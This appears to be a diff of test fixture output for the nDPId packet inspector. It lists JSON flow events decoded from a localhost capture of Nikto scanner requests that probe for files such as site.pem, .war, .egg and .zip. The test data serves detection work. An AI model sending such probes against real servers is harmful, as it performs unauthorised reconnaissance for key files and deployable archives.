+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277014,"pkt":"AAAAAAAAAAAAAAAACABFAADAIeRAAEAGGlJ\/AAABfwAAAcNCH5DPShmIhuR59oAYAED+tAAAAQEICp1m\/D6dZvw+R0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277016,"pkt":"AAAAAAAAAAAAAAAACABFAADA415AAEAGWNd\/AAABfwAAAcNEH5AFlNs7Kigy04AYAED+tAAAAQEICp1m\/ECdZvxAR0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277017,"pkt":"AAAAAAAAAAAAAAAACABFAADConZAAEAGmb1\/AAABfwAAAcNGH5DVgZoTcsiCOoAYAED+tgAAAQEICp1m\/EGdZvxBR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277019,"pkt":"AAAAAAAAAAAAAAAACABFAADCTHZAAEAG771\/AAABfwAAAcNIH5DfPnQTJOA0c4AYAED+tgAAAQEICp1m\/EKdZvxCR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277020,"pkt":"AAAAAAAAAAAAAAAACABFAADCeAVAAEAGxC5\/AAABfwAAAcNKH5DAxUBlVYOEbYAYAED+tgAAAQEICp1m\/ESdZvxER0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277021,"pkt":"AAAAAAAAAAAAAAAACABFAADC3f5AAEAGXjV\/AAABfwAAAcNMH5AeDOWcmsl5CIAYAED+tgAAAQEICp1m\/EWdZvxFR0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277023,"pkt":"AAAAAAAAAAAAAAAACABFAAC9\/jtAAEAGPf1\/AAABfwAAAcNOH5DeVcZf0\/y26IAYAED+sQAAAQEICp1m\/EedZvxHR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277025,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VlRAAEAG5eR\/AAABfwAAAcNQH5CjGG47rGEO3YAYAED+sQAAAQEICp1m\/EmdZvxJR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 